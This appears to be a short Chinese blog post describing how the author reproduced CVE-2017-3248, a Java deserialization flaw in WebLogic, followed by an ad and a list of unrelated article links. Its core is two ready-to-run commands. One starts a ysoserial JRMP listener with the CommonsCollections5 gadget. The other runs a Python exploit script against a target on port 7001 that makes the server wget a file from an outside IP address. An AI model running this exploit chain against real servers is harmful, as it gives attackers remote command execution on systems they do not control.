CVE-2017-3248简单复现

我是这样操作的
目标跟windows在一个段,linux是另一个段的,我的虚拟机

windows主机上

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"

linux虚拟机上执行

python exploit-CVE-2017-3248-bobsecq.py -t 目标IP -p 7001 --jip 11.205.242.98 --jport 1099 --cmd "wget http://11.205.242.98/32.txt" --ysopath ysoserial.jar

简单证明即可

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/mrhonest/p/11533997.html

推荐文章
$.ajax()方法详解
浅谈Java中的hashcode方法
ORACLE 中ROWNUM用法总结!
javascript 闭包
【CSS进阶】伪元素的妙用--单标签之美
聊一聊程序员的自我修养
遍历Map的四种方法
对一致性Hash算法，Java代码实现的深入研究
centos7安装uwsgi报错
查看Django版本
python升级引发的问题总结
python2.6升级2.7导致yum无法使用 No module named yum
rm删除破折号
Django请求原理（二）
linux后台运行和关闭、查看后台任务
middle中间件
Nginx配置（一）
将Centos的yum源更换为国内的阿里云源
vue+element-ui实现显示隐藏密码
JS 获取图片的base64编码
JS 获取本月第一天零点时间戳并转化成yy-mm-dd
JS 两个对象数组合并并去重
element ui datePicker 设置当前日期之前的日期不可选
整理一些vue elementui 问题 + 链接方法
css 修改placeholder的颜色
js循环内0.5s停止
自定义border 为 dashed 时的虚线间距
如何让浮动元素水平/垂直居中
centos7.6设置sftp服务
HikariCP Druid比较